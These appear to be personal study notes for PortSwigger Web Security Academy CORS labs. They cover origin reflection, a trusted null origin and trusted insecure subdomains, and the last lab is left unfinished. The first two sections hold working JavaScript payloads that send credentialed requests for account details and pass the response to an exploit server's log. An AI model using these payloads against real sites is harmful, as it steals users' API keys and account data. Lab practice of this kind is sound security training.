CORS | Notion

CORS vulnerability with basic origin reflection

if the Access-Control-Allow-Credentials header is present and when we add Origin: [<https://example.com>](<https://example.com/>) to our request we observe Access-Control-Allow-Origin: [<https://example.com>](<https://example.com/>)

This means that we can do this in the body of the exploit serv:

<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','<https://0ac5009d04822ad180cd30b100b0009b.web-security-academy.net/accountDetails>',true);
    req.withCredentials = true;
    req.send();
    function reqListener() {
        location='/log?key='+this.responseText;
    };
</script>

CORS vulnerability with trusted null origin

if it has a whitelist of authorized urls with Origin: but accepts Origin: null

if when we add Origin: null in our request the server responds Access-Control-Allow-Origin: null and Access-Control-Allow-Credentials: true

so it is possible to do this:


<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();
    function reqListener() {
        location='YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key='+encodeURIComponent(this.responseText);
    };
</script>"></iframe>

CORS vulnerability with trusted insecure protocols

Here, if we submit Origin: [<http://example.com>](<http://example.com>) to the GET /accountDetails request, the server won't accept (it doesn't respond with an Access-Control-Allow-Origin : [<https://example.com>](<https://example.com>) header)

But if we submit a subdomain Origin: <http://grosskibidi.0a1f00e704880fd4874ab1c300a40083.web-security-academy.net>

it's ok the server responds with

Access-Control-Allow-Origin: <http://grosskibidi.0a1f00e704880fd4874ab1c300a40083.web-security-academy.net> Access-Control-Allow-Credentials: true

our request must therefore be initiated by a subdomain

That's good, we have stock.0a1f00e704880fd4874ab1c300a40083.web-security-academy.net

vulnerable to reflected XSS in productID